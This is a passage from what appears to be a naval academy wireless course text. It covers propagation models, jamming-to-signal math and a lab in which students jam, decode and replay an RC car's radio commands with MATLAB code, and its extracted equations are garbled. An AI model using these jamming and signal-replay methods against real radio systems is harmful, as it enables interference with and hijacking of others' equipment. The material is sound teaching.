for wireless communications. Important note: in this equation, there are NO decibel terms! The two most common mistakes made when using this equation is using dB values instead of linear values, and failing to get the wavelength/distance units correct. If you’re given a problem that includes dB values for any of the terms, take the values out of decibels! Let’s go back to our cell phone example. Practice Problem 25.2 Your cell phone transmits at a power level of 500 mW, with an antenna gain of 2.0 dB. The cell tower has an antenna gain of 8.0 dB, and is a distance of 5 miles away. For LTE, you’re transmitting at 700 MHz. Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a cellular “dead zone”? (note: 1 mile = 1.609 km, and consider −105 dBm as the minimum power required to be able to “close the link”) Note: The Friis Free Space equation is technically only valid for free-space environments (although many situations will mimic free space). So the question is: what happens when we add back in the mountains, the buildings, the earth, and the atmosphere? 542 IV. Log-Normal Model Most terrestrial wireless communications operate in the VHF and UHF bands. Those bands are mostly used for narrowband, long-distance communication. In this frequency range, the earth and atmosphere play a far smaller role, and propagation becomes dominated by the specific local environment. Let’s consider the following scenario. Suppose we convince the ECE Department to build a cell tower on the top of Rickover Hall, and you’re driving down McNair Road. The signal you receive will be a combination of reflection, diffraction, and scattering, as shown in the image below. The problem is that we call it “mobile” radio for a reason: you want to be able to drive, move about the local environment, and communicate on your cell phone at the same time. Diffr a Sc r tte g in R e e fl actio n on c ti As you move about the environment, the three propagation modes will have an impact on the instantaneous received signal in different ways. Under these conditions, you receive a nice strong signal reflected from Mahan Hall, with a little bit of signal energy coming from diffraction off the back corner of Nimitz Library, along with some energy scattered by the clock tower. As you move towards Alumni Hall, the direct line-of-sight signal to the tower will be blocked, as will most of the strong reflected signals; diffraction is now the dominant mode. Conversely, if you moved towards Rickover Hall, you would receive a nice strong line-of-sight signal from the tower, along with a strong reflection from the Northeast side of Nimitz Library as well as scattering from all the parked cars in the Triangle Lot (between Rickover Hall and Nimitz Library). So the question remains: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a cellular “dead zone”? What happens when you put all three major modes of propagation together? How do you create a simple easy-toutilize model to compute the resulting received signal power? Clearly, the Friis Free Space equation is out, since it is based on unobstructed, direct line-of-sight transmission. In addition, ground wave/sky wave effects are so small that they can be neglected. Although numerous sophisticated models exist (and are used to varying degrees in both commercial and military systems), by far the simplest and most common way to describe propagation in such an environment is the Log-Normal model (also called Log-Distance model). This model is widely used to not only predict coverage for a particular mobile user, but also for predicting the interfering signal power that the mobile user will experience from other RF sources. A description of the log-normal model begins with the definition of path loss. Path loss is the amount by which the transmitted signal has dropped by the time it gets to a receiver at distance d away. Usually computed in decibels, path loss as a function of distance d is defined as: PLdB (d) = Pt (dB) - Pr(dB) (d) Over the years, wireless engineers have observed that average path loss for a particular environment is related to the distance d and follows a dn relationship, where the variable n is known as the Path Loss Exponent, and n is specific to that environment. Researchers have also observed that when they made numerous measurements at a specific distance (but in different local environments), the variation in received signal power obeyed a “bell curve” distribution about the local mean (the “bell curve is formally known as a “Normal” or “Gaussian” distribution). Plotted on a log scale, the results look something like this: 543 PL (dB) Average Path Loss Gaussian distribution of Path Loss about that particular distance Distance Dependent Mean 1m 10m 100m 1km 10 km Dist (m) We call this Log-Normal Path Loss. Average Path Loss obeys a linear relationship (straight line) on a log scale, and the variation in received power at that distance follows a normal distribution. The slope of the line is the Path Loss Exponent, and is determined experimentally for the particular scenario of interest. Mathematically the Log-Normal Path Loss at a distance d is given by: ædö PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷ è d0 ø In this equation, the variables are: d d0 n PLdB(d) PLdB(d0) Distance from transmitter to receiver in meters A reference distance, usually 1 meter Path loss exponent (unitless) Path loss at distance d (in dB) Path loss at reference distance d0 (in dB) The value of PLdB(d0) is usually calculated with the Friis Free-Space equation or measured empirically. Note that antenna gains, wavelength, etc. are embedded in the model (in PLdB(d0) and n) parameters. Changing the configuration means we will end up with different model parameters and different results. Values for path loss exponents have been tabulated for a number of environments, and a few representative values are given in the following table. Path Loss Exponents for Different Environments Environment Path Loss Exponent, n Urban Area Dense Urban Area In Building with Line-of-Sight In Building Obstructed Factory Floor Obstructed Retail Stores 2.7 to 3.5 3 to 5 1.6 to 1.8 4 to 6 2 to 3 1.8 to 2.5 So after all that discussion, we still haven’t answered the question: Using your brand-new iPhone (or Samsung phone as the case may be), will your signal make it to the tower and will it have sufficient power to “close the link” and allow you communicate? Or will you suffer the fate of a cellular “dead zone”? Practice Problem 25.3 Your cell phone transmits at a frequency of 700 MHz and a power level of 500 mW, and has an antenna gain of 2.0 dB. The ECE Department’s cell tower has an antenna gain of 8.0 dB. Let’s assume you’re at the entrance to Gate 8, which would put you approximately 1.0 km away from the tower. From the table above, the USNA campus most closely matches “Urban Area”, so let’s use a Path Loss Exponent that’s exactly in the middle of the range 2.7-3.5, so use n = 3.1. 544 We will need to calculate the path loss at a reference distance (PLdB(d0)). The choice of reference distance is technically arbitrary, but is typically 1 meter, as it makes the math much easier to work with. First, convert antenna gains out of decibels and compute wavelength: Gt = 10 10 = 1.585, Gr = 10 10 = 6.310, l = 2 8 m c 3´10 8 sec = = 0.428 m f 700 ´10 6 Hz Now use the Friis Free Space equation to calculate the the received power at 1m: Pt Gt Gr l 2 500 mW×1.585 × 6.310 × ( 0.428 m ) = = 5.8 mW, ( 4p d ) 2 ( 4p ×1 m )2 2 Pr (at 1 m) = or in dBm, æ 5.8 mW ö 10 log10 ç = 7.6 dBm è 1 mW ÷ø Compute the path loss at the reference distance: PLdB (d0 = 1 m) = Pt (dBm) - Pr(dBm, 1 m) = 27 dBm - 7.6 dBm = 19.4 dB Compute the path loss at distance d = 1000 m: ædö æ 1000 m ö PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷ = 19.4 dB +10 × 3.1× log 10 ç = 112.4 dB è 1 m ÷ø d è 0ø Finally, determine received power at the cell tower: PLdB (d0 = 1000 m) = Pt (dBm) - Pr(dBm, 1000 m) so Pr(dBm, 1000 m ) = Pt (dBm ) - PLdB (d0 = 1000 m) = 27 dBm -112.4 dB = - 85.4 dBm Note that this is actually weaker (by 15 dB, or a factor of 30) than the received power at a distance of 5 miles (8 km) that was predicted by the Friis Free Space equation for a similar scenario in the previous Practice Problem. This illustrates the inaccuracy of using the Friis equation in scenarios that are not free-space. Incidentally, a received signal power of −85.4 dBm is still sufficient to “close the link” and communicate with the tower (recall that −105 dBm is the minimum power to “close the link”). 545 546 Problems 1. Is diffraction harmful or advantageous in radio communications? Explain. 2. What are the three modes that an electromagnetic wave can travel from a source to a destination? 3. What is the term used for an electromagnetic wave that propagates by line-of-sight? 4. A ship-to-ship marine-band VHF radio operates at 156 MHz and is limited to a maximum of 25 watts. The signal propagates via space propagation, so it is limited in range to direct line-of-sight. A Coast Guard transmitting station on shore has a monopole antenna that is 350 feet tall. (a) If a ship is 35 miles (56,315 m) away from the CG station, how high must the ship’s monopole antenna be mounted to ensure reception? (b) Using the Friis Free-Space equation, calculate the received power at the ship. (c) If someone is standing in a life raft with a hand-held VHF radio (assume antenna height of 6’), what is the maximum range from which they could contact the ship in part a? 5. In a certain communication link, the transmit power is 5 W and the path loss is 100 dB. What is the received power in mW? 6. Use the log-normal model to solve for the distance of transmission (d) given the following parameters. Use the Friis FreeSpace equation to determine the path loss at d0 = 1 m. n = 2.7, f = 900 MHz, Pt = 10 dBm, Pr = −70 dBm, Gt = 1.64, Gr = 5 dB. 547 548 Security Exercise 25 Drivers start your engines. Today we looked at various ways radio waves propagated through space, air. For this lab, we will be using radio control (RC) cars, our communication system, to evaluate the propagation of electromagnetic waves as they traverse through space. Now we have gone out of the way to purchase the best radio control cars in the world. That’s right! Only the best for you guys. We acquired Ferraris, Audi R8, Lamborghinis, Camaros, etc. Don’t they look so pretty? The cars that you have available to you today operate at a couple of different frequencies. Question 1: Examine the cars and write down the frequencies at which the cars operate on your answer sheet. Question 2: Based on the frequencies you just determined for the cars in you classroom and what you learned in class, which propagation mode is used to control these cars? (i.e. ground wave, sky wave, space wave) Question 3: Why won’t the other two propagation modes work? Question 4: What are the wavelengths of the frequencies associated with the RC cars? Show your work and record your wavelengths on the answer sheet. Now that you know the wavelengths associated with the frequencies, how far do you expect the cars to travel? You need some information to calculate the distance. The gain for the transmitting antenna is -8 dB. The gain for the receiver antenna is also -8 dB. The power of the transmitter (PT) is 10 dBm. The minimum power necessary at the receiver (PR) to control the car is -50 dBm. Rearrange and use the Friis Free Space equation to determine the distances for both the high- and low-frequency car. Question 5: Show your work and record your expected distances on the answer sheet. Alright. You have your calculation. Now, it’s time to take measurements and see how accurate they are. Measure how far the lower frequency car will go. Make sure your measurement is in meters. Drive from the front of the classroom to the back and around back benches, not out of the classroom. Remember the distance be should a straight line to the car, not the path is takes. So how far did it travel? Question 6: Record the experimental distance for the lower frequency car on the answer sheet. You should’ve noticed that the car didn’t go nearly as far as you calculated. Why? Think back to the equation you used to calculate the distance. What did we say about the equation? It needs to be used in free space without obstructions. That means no terrain, mountains, buildings, ground, or atmosphere. In the classroom, there are desks, lab equipment, people—all obstacles. So the Friis Free Space equation isn’t going to provide an accurate distance. When we have all this furniture and equipment that can interfere with the signal, they will reflect the signal, diffract the signal, and/or scatter the signal. Remember that: (1) Reflection occurs when energy (or the signal) reflects off a large (relative to the λ) conductive surface. (2) Diffraction occurs when energy bends around objects. (3) Scattering occurs when EM waves strike a rough surface (smaller than λ) and re-radiates the EM wave in many different directions. As the signal is affected by all the lab equipment, people, etc., the signal at the receiver is a combination of many variations of the original signal. This variation leads to a reduced signal strength. So how are you going to determine how far the higher frequency car should go? 549 Let’s use the Log-Normal model. This model is widely used to not only predict coverage for a particular mobile user (i.e. the RC car), but also for predicting the interfering signal power that the mobile user will experience from other Radio Frequency sources (i.e. the cell phones in your pocket). The log-normal equation is: ædö PLdB (d) = PLdB (d0 ) +10 × n × log10 ç ÷ . è d0 ø To predict the distance of the high frequency car, you need a few pieces of information. Inside a building with obstructions (i.e. your classroom), you would expect a path loss exponent of 4-6. For your classroom, use 4 as the path loss exponent (n = 4). At the max distance, you would expect a Pr of −50 dBm, and your Pt is 10 dBm (use the difference in Pt and Pr to determine PLdB(d)). The last piece of information you need to make your calculation work is: at d0 = 1 meter, the path loss is 10 dB (that is, PLdB(d0) = 10 dB). Use the path-loss equation above to compute the distance d, given these parameters. Question 7: Show your work and record the new expected distance (d) for your higher frequency car on the answer sheet. Question 8: Now go drive the higher frequency car. Drive from the front of the classroom to the back and around back benches, not out of the classroom. How far did it go in meters? Remember the distance should be a straight line to the car, not the path is takes. You did it. So now you can calculate, at least for a RC car, the distance a radio wave will travel. But be aware that if you change the configuration, (i.e. you go into the hall) you will have different model parameters and therefore different results. One last test of you mathematical skills. Calculate the distance the lower frequency car will travel if you were outside. In this case, use a path loss exponent (n) of 2.6. All other parameters are the same. Question 9: What is the expected distance (d) for your lower frequency car? Record on the answer sheet. Watch the Youtube video, RC Car Outside Distance. Question 10: Were you correct (roughly)? ____________________________ Your final test. Using either car, place the car against the wall inside the classroom next to the door. Go outside the door where you can no longer see the car. Just on the other side of the wall should be fine. Try to move the car using the radio controller. Question 11: Did it move? Why or why not? (hint: Think back to the 3 interferences on page 3.) 550 EC310 Security Exercise 25 Name: __________________________________________________________________________________________ Question 1: Low frequency = _____________ High frequency = _____________ __________________________________________________________________________________________ Question 2: __________________________________________________________________________________________ Question 3: __________________________________________________________________________________________ Question 4: Wavelength (low frequency car) = _____________ Wavelength (high frequency car) = _____________ __________________________________________________________________________________________ Question 5: Distance (low frequency car) = _____________ Distance (high frequency car) = _____________ __________________________________________________________________________________________ Question 6: Experimental distance for low frequency car = _______________________________________________________________________________________ Question 7: __________________________________________________________________________________________ Question 8: __________________________________________________________________________________________ Question 9: __________________________________________________________________________________________ Question 10: __________________________________________________________________________________________ Question 11: __________________________________________________________________________________________ 551 552 Chapter 26: Electronic Warfare Objectives: (f) Define Electronic Warfare and provide an example of each of the three Electronic Warfare categories: Electronic Defense, Electronic Warfare Support and Electronic Attack. (g) Define Jamming to Signal ratio (J/S) and calculate the necessary power to jam an emitter. Connection to Cyber Security Warfare involves offensive and defensive operations. In the Host Module, we learned that an adversary can attack our host computer by employing a buffer overflow exploit. To counter this attack, we have several defensive actions at our disposal; for example, we can avoid the C library functions that are notorious for inviting buffer overflows, we can use a non-executable stack, a canary can be used to detect an attempt to overwrite a stored return address, etc. Recall also that, aside from formal attack operations and defensive responses, an adversary might attempt to look for flaws in our host software. For example, an adversary might enter a ridiculously long value when prompted to enter something, as a test to see if he can make the program behave erratically. In the Network Module, we learned that an adversary can attack our network using either a false route injection attack or a wide-area BGP route-hijacking attack. To defend against false route injection, we can use an OSPF authentication mechanism, or we might selectively set up passive interfaces on router ports. To defend against a wide-area BGP routehijacking attack, we can use judicious filtering at Autonomous System borders, or we might attempt to authenticate routing information against an Internet Routing Registry, or we can attempt to receive some cryptographic assurance of the routing information we receive by using the Resource Public Key Infrastructure. Recall also that, aside from formal attack operations and defensive responses, an adversary might attempt to perform "network reconnaissance" by using Wireshark, nmap or various network utilities. Not surprisingly, we find in the Wireless Module that the electromagnetic spectrum can also be used for offensive and defensive operations, as well as for "reconnaissance" operations. In the context of wireless systems, these attack, defensive and reconnaissance operations are termed electronic warfare. The jamming and taking over of communication links are two of the ways that cyber attackers exploit wireless communications. Electronic Warfare (EW) The term Electronic Warfare (EW) refers to any action involving the use of electromagnetic energy to attack an adversary or to otherwise control the electromagnetic spectrum. EW includes three major subdivisions: electronic attack, electronic defense, and electronic warfare support. We'll discuss each of these in turn, starting with electronic warfare support. A. Electronic Warfare Support Electronic warfare support refers to those actions that are taken to search for, intercept, identify, and locate sources of radiated electromagnetic energy for the purpose of target identification, or for the planning and conduct of future operations. Phrased another way, electronic warfare support entails gathering knowledge about the enemy through the use of the electromagnetic spectrum. We discussed an example of electronic warfare support in Security Exercise 23. Recall that in that lab you wandered the hallways of the Rickover lab deck in search of a wireless access point. This was, at heart, an electronic warfare support operation—you were attempting to locate a radio emitter of interest. In the lab, your only goal upon locating the emitter was to note the funny message placed next to it. In a more realistic scenario, the data gathered from an emitter could produce intelligence concerning the user (friend or foe?) and their location. Suppose you can pick up an adversary’s radio transmission. How could you determine the direction it is coming from? If you used a directional antenna like a Yagi you could determine a compass bearing in the direction of the emitter. If you get a compass bearing from three locations you could plot the bearings on a map and get a fix. This was actually one of the early means for ships to fix their position by electronic means, via the Omega or Loran C navigation systems, which were operational until shut down in favor of GPS. 553 B. Electronic Defense Electronic defense includes those actions taken to protect personnel, facilities, and equipment from an adversary's use of the electromagnetic spectrum to attack us. It should be noted that in DoD literature (if one may use the word literature to describe stultifying, committee-drafted, jargon-laden, gobbledygook), the term "electronic defense" is often termed "electronic protection", since in defending ourselves, we are protecting ourselves. (A few years ago, the in-vogue term for electronic defense was electronic counter countermeasures –ECCM. Before that, the preferred term was electronic protective measures.) We discussed an example of electronic defense in Security Exercise 23. Sure enough, you were simply wandering the hallways in search of a wireless access point. But in an analogous fashion, an adversary can home in on the transmissions of a ship, a submarine, an aircraft, or forces in the field. To prevent an adversary from using the electromagnetic spectrum to locate our transmitter, we will often limit radio communications to the minimum necessary. Thus, emissions control is a form of electronic defense. Another form of electronic defense is the use of stealth technologies (shapes with low radar cross-sections, non-metallic materials, radar-absorbent coatings) to protect aircraft and ships from radar detection. The definition of electronic defense is broadened to also include not only the actions we take to defend ourselves, but also the actions that we take to protect our own ability to attack the enemy. This can lead to some confusion. For example, if we launch an infrared homing missile against an enemy, we are engaging in electronic attack. If our enemy sees the incoming missile and launches flares in an attempt to divert it, he is engaged in electronic defense and electronic attack. But if we counter his flares by using flare-rejection technology on our infrared homing missile, we are also engaged in electronic defense, since the flare-rejection technology protects our ability to attack! Think of the great exam questions! C. Electronic Attack Electronic attack involves the use of electromagnetic energy to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying an enemy's combat capability. The preeminent example of electronic attack is jamming. Jamming Jamming is the transmission of an electromagnetic signal that disrupts an adversary's communications. 554 Consider the picture below. An enemy transmitter is sending information to an enemy receiver at a certain frequency, say f. The enemy transmitter and receiver are separated by a distance dS. Meanwhile, our hero is a distance dJ away from the enemy receiver. Our hero's goal is to transmit another signal—a jamming signal—at the same frequency—f—that the bad guys are using. The jamming signal will target the bad guy's receiver. So, the intent is to have two signals arrive at the bad guy's receiver: the signal sent by the bad transmitter, and the midshipman's jamming signal. The midshipman's goal is to have his jamming signal be of sufficient power to override the signal from the bad transmitter, thus preventing the bad guys from communicating. It is important to note that what we are jamming is the receiver, not the transmitter. As an analogy, imagine trying to yell something to someone across Worden Field. If a third person comes along and wants to prevent you from communicating, what would be more effective: to yell in the ear of the person trying to relay a message or to yell in the ear of the person trying to hear the message? The latter would be more effective. I know what you are saying: Where's the math? For the jammer, the object is that the received jamming power at the Bad Guy receiver be greater than the received signal power from the Bad Guy transmitter. Using the Friis equation, the received jamming power (PJ) in terms of the jammer’s EIRP is (rearranging the equation a little): PJ = EIRPJ ×Gr × l 2 ( 4p d J )2 = EIRPJ Gr l 2 æ EIRPJ ö æ Gr l 2 ö = . ( 4p )2 × dJ2 çè dJ2 ÷ø çè 16p 2 ÷ø Similarly, the received signal power from the Bad Guy transmitter is: æ EIRPS ö æ Gr l 2 ö PS == ç . è dS2 ÷ø çè 16p 2 ÷ø If we divide the received jamming power by the received signal power, we create the jamming-to-signal ratio (J/S), a term similar to a signal-to-noise ratio: æ EIRPJ ö æ Gr l 2 ö çè d 2 ÷ø çè 16p 2 ÷ø J æ EIRPJ ö çè d 2 ÷ø æ EIRP ö æ d 2 ö J PJ J J S = = = = . S PS æ EIRPS ö æ Gr l 2 ö æ EIRPS ö çè EIRPS ÷ø çè d J2 ÷ø çè d 2 ÷ø çè 16p 2 ÷ø çè dS2 ÷ø S 555 Note that the wavelenths cancel since in order for our jamming to be effective, our jamming signal must be the same frequency as the transmitted signal. This equation is usually used in terms of decibels, so for power in watts, æ Jö çè S ÷ø = EIRPJ ( dBW ) - EIRPS ( dBW ) + 20log10 ( dS ) - 20log10 ( d J ) , dB and for power in milliwatts, æ Jö çè S ÷ø = EIRPJ ( dBm) - EIRPS ( dBm) + 20log10 ( dS ) - 20log10 ( d J ) . dB A J/S ratio greater than one (or a positive dB value) will mean the received jamming signal is stronger than the received Bad Guy transmitter signal. Note that in these J/S equations, the distances to the jammer and to the signal must be in the same units (e.g., meters). Finally, an important assumption this equation makes is that the receiver has an omnidirectional beam pattern. This means the receiver will accept transmissions equally from all directions. If this were not so, then the equation above would need to take the receiver’s beam pattern into account. Practice Problem 26.1 You are located 5500 meters from the omnidirectional receiver you are jamming. The transmitted signal that you are jamming originates 9500 meters from the receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and jammer have line of sight, what EIRPdBW must you transmit to jam the receiver with a J/S of 5 dB? How many watts is this? Solution: Practice Problem 26.2 You can transmit an EIRP of 25 Watts with your jammer. The transmitted signal you are jamming originates 8500 meters from the omnidirectional target receiver. The signal transmitter’s EIRP is 15 dBW. Assuming both the transmitter and jammer have line of sight, how close must your jammer be to the target receiver to achieve a (J/S) dB of 3 dB? Solution: 556 Practice Problem 26.3 Is there a possibility that our jamming scheme would not work if the Bad Guy Receiver was not omnidirectional? Explain. Solution: 557 558 Security Exercise 26 Basics of Electronic Warfare We devoted an entire third of this course to learning about wireless communications systems and the associated considerations, from modulation to gain to antennas and signal propagation. Why? Because “Cyber” doesn’t exist solely in a single computer or a closed network. You can have a significant impact by using Electronic Warfare as an enabler for Cyber attacks. See: http://breakingdefense.com/2013/04/adm-greenert-wireless-cyber-em-spectrum-changing-navy/ Now we’re going to put all that knowledge to the test and apply your cyber skills in a wireless environment. Set-up. Equipment required: □ □ □ □ □ □ □ □ Your issued Laptop MATLAB Code RCcode.m and getkey.m o Located in the EC310 Spring 2014 folder on your Desktop (EC310 Spring 2014\Wireless\Lab 27 Files) LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope Anritsu MS2711D Spectrum Analyzer Telescoping Antenna w/ BNC connector RC Vehicle Signal Generator & accessories (Instructor will set up) TURN OFF YOUR CELL PHONE! (The next hour of your life will be easier if your cell phone isn’t adding noise to the Electromagnetic Spectrum.) Part I: Data Collection Communications System. For this Security Exercise, we’ll explore the entire communications system employed by a Radio Control (RC) vehicle… And then we’ll exploit it! Answer the questions that follow to examine the RC vehicle’s communications. 559 Note: These images resemble the models in your classroom enough to give you the general idea. We can’t all have Ferraris, after all! Question 1: Which image above (left or right) most closely represents the transmitter? Question 2: Where is the receiver located? Question 3: What type of channel does this communications system involve? Question 4: What do you expect your “information” to be in this case? Question 5: What will happen when the “information” is recovered at the receiver? Question 6: What type of antenna does the transmitter use? Question 7: What would you expect the beam pattern of this antenna to look like? Question 8: Do the transmitter or receiver give any indication of carrier frequency? If so, what is fc? To verify the carrier frequency of the transmitted signal, use the Anritsu MS2711D Spectrum Analyzer. □ □ □ □ □ □ Press “Recall Setup” (Hard Key #6) Ensure “Default” is highlighted Press “Enter” Set “Center” to the carrier frequency determined in the previous question. Set “Span” to 200 kHz Transmit from RC vehicle controller (ensure power is on); signal will display on the spectrum analyzer Question 9: What is the carrier frequency? Draw the signal in the frequency domain. Part II: Jamming Now that we have some basic intel, what could happen if your instructor was to transmit a signal at the carrier frequency? The answer: It depends! In lecture, we learned that the effectiveness of electronic attack/jamming is dependent upon the jamming-to-signal Ratio (J/S). The J/S is dependent upon both the power received by the car from the jammer and the transmitter as well as the distance of the jammer and the transmitter from the receiver. In this security exercise, our scenario looks like this: 560 The J/S depends on the received signal power at the car and the received jamming power at the car: æ PJ ö æ Jö çè ÷ø = ç ÷ = PJ (dBm) - PS(dBm) S dB è PS ø dB Generally, if the J/S ratio is greater than 1 (or 0 dB), jamming will be effective. □ Play time! Drive your vehicle around the classroom. Question 10: What two conditions (with regards to frequency and received power) must exist for jamming to be effective? Get your instructor’s signature to continue. □ Your instructor will generate a 20 dBm frequency modulation (FM) signal at the carrier frequency. Question 11: What is your instructor’s target? □ While your instructor is transmitting the jamming signal, experiment! Attempt to control the RC car with its transmitter at different distances from both the jammer and the RC car. Question 12: When your instructor transmitted a jamming signal, were you still able to control the RC car? When could you control it? When couldn’t you? Question 13: Use the Anritsu MS2711D Spectrum Analyzer to draw the jamming signal in the frequency spectrum. How does this change if you transmit while standing next to the Spectrum Analyzer? Question 14: How could you increase the range of the jammer? (How is jamming range dependent on signal power?) 561 Part III: Reverse Engineering So now we know the carrier frequency and the effects of transmitting a higher signal power on that frequency, but if we want to make a bigger impact, we need to know more about the RC car’s signal. What does the transmitted signal look like? What type of modulation does it use? How do controls work? To accomplish this, we’re going to look at the signal using the LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope. First, some initial set-up for the O-Scope (see the figure that follows for button location): □ Touch the yellow box on lower left corner of touch screen to configure Channel 1 with the following settings: o Set Volts/div to 20 mV o Set Coupling to DC50 o Set “Trigger” to 25.0 mV o Touch “Timebase” to set Time/Division to 5.00 ms/div o Press “Close” (top right corner for Channel 1 menu) 562 Once you’ve set up your Channel configuration on the O-Scope, it’s time to capture the signal. □ □ □ On “Trigger” section of O-Scope display, select “Normal” Holding RC car transmitter close to the O-Scope, send the “forward” signal by driving the car forward. Ensure antenna is extended! When your signal is displayed on the screen, press “Stop” on Trigger menu, while still sending the “forward” signal. If done correctly, your O-scope display should look similar* to this: * Captured signal may vary – that’s ok for now! Question 15: What type of digital modulation does this car use? Question 16: What pattern of 0s and 1s does the transmitted signal represent? To be able to control the RC car, we want to be able to do more than just drive it forward. How does the signal change for reverse, left, or right? Think about the controls – how many different signals do you expect to control the car? In addition to driving forward, the car can operate in reverse, as well as turning left and right… and any combination thereof! There are actually 8 different combinations of signals, but in the interest of time we’re only going to worry about four: Forward, Reverse, Forward & Right, and Forward & Left. Here’s the catch: the chips that process the signal and control the vehicles motion aren’t necessarily wired the same way in every car, so you need to identify which control operation each transmitted signal represents! Examine each transmitted signal by repeating the process you just followed to capture the signal: □ □ □ On the “Trigger” section of O-Scope display, select “Normal”. Transmit desired signal. o Forward o Reverse o Forward AND Right (This is different from the signal to pivot the wheels to the right only!). o Forward AND Left (This is different from the signal to pivot the wheels to the left only!). When your signal is displayed on the screen, press “Stop” on Trigger menu. Question 17: Match the transmitted signals (shown on the following page) with the operations they represent by circling the correct response. The signals can be distinguished by the number of 1s being transmitted after the 4 large sync pulses. 563 Forward or Reverse or Forward-Right or Forward-Left?? ( # of 1’s: 10) Forward or Reverse or Forward-Right or Forward-Left?? ( # of 1’s: 40) Forward or Reverse or Forward-Right or Forward-Left?? ( # of 1’s: 34) Forward or Reverse or Forward-Right or Forward-Left?? ( # of 1’s: 28) Question 18: Now that you’ve identified the modulated signal that controls the car, could you determine the baseband binary signal (voltage pulses) that are used for each control function? The block diagram for an OOK signal’s generation is shown below. We now know the bits that are transmitted to control the forward, turning, and reverse motions of the RC car. We also know that we can’t transmit the baseband binary signal, so we need to modulate it on a high frequency carrier. If we could reproduce these control signals and transmit by some other means than the car’s remote, do we need the remote to drive the RC car? Let’s find out! Part IV: The Hook In this section, you’ll use the MATLAB code provided and your laptop soundcard to generate and transmit control signals to the RC car. You may have noticed that each transmitted signal consists of 4 wide “sync” pulses followed by a trail of 0’s and 1’s. Since you’ve already matched the waveform to the driving direction, now all you need to do is determine the number of 1’s in the trail following the sync pulses. For example, in the image below represents 564 01110111011101110101010101010101010101110 in binary (check back to HW23 if you’re not a believer yet – you knew this way back when!). For this sequence of bits, it is organized as follows. On the oscilloscope, the control signal will be displayed as seen in the next figure. Question 19: Fill in the table by entering the number of 1’s trailing the sync pulses for each RC car operation determined in Question 18. You must find the exact value! Direction Number of 1’s in trail Forward Reverse Right N/A Left N/A Fwd-Right Fwd-Left Rev-Right Rev-Left N/A N/A The MATLAB code takes input from the arrow keys on your laptop, generates the baseband binary signals to control the RC vehicle, then modulates the signal with OOK. Since we only determined the binary waveform for 4 of the 8 possible operations, we’ll be slightly limited in the operation of our RC vehicle – we won’t be able to turn while operating in reverse. □ In MATLAB, update the “Setup Major Variables” section of your RCcode.m code (shown below) with the number of 1s in the “trail” in preparation of taking over the RC vehicle. %%%%%%%%%%%%%%%% % RC CAR CODE % %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % PRESS SPACE TO TERMINATE EXECUTION % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % !!!!! NOTE !!!!! % If you do something wrong and Matlab terminates unexpectedly (you get a % lot of angry red Error messages) you will have to close out and restart % Matlab in order to clear out the sound card buffer!!! % % Forward = Up Arrow % Reverse = Down Arrow % Forward Right = Right Arrow % Forward Left = Left Arrow % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% 565 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Clear out memory and initialize default settings % % DO NOT CHANGE THIS SECTION % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% clear all close all set(0, 'DefaultAxesFontSize', 14) set(0, 'DefaultAxesFontWeight','Bold') %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Change This Section! %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Setup major variables % % CHANGE THIS SECTION ONLY!!! (FOLLOW LAB INSTRUCTIONS) % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% forward_1s = 01; reverse_1s = 01; Insert Number of 1’s from Question 20 table here! right_fwd_1s = 01; left_fwd_1s = 01; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% sam_per_sym = 22; %fs/Rb = 44.1e3/(1/Tb), Tb ~ 500us fs = 44.1e3; % Set sampling rate to sound card rate Rb = fs./sam_per_sym; fif = 10e3; % 10.0 kHz "baseband" (IF) Frequency %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Generate the original data to manipulate the car % % DO NOT CHANGE THIS SECTION % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% sync = [1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0]; forward = [sync repmat([1 0], 1, forward_1s)]; reverse = [sync repmat([1 0], 1, reverse_1s)]; right_fwd = [sync repmat([1 0], 1, right_fwd_1s)]; left_fwd = [sync repmat([1 0], 1, left_fwd_1s)]; pause = zeros(1,500); key = 0; % Initial Keyboard Value %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Reads inputs once per second % % DO NOT CHANGE THIS SECTION % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% while key ~= 32 %Press space to stop key = getkey(1); if key == 30 data = [forward forward forward forward forward forward forward forward]; elseif key == 31 data = [reverse reverse reverse reverse reverse reverse reverse reverse]; elseif key == 29 data = [right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd]; elseif key == 28 data = [left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd]; else data = [pause]; end % Generate Polar NRZ 566 time_stop = length(data).*sam_per_sym; up_data = zeros(1,time_stop); time = 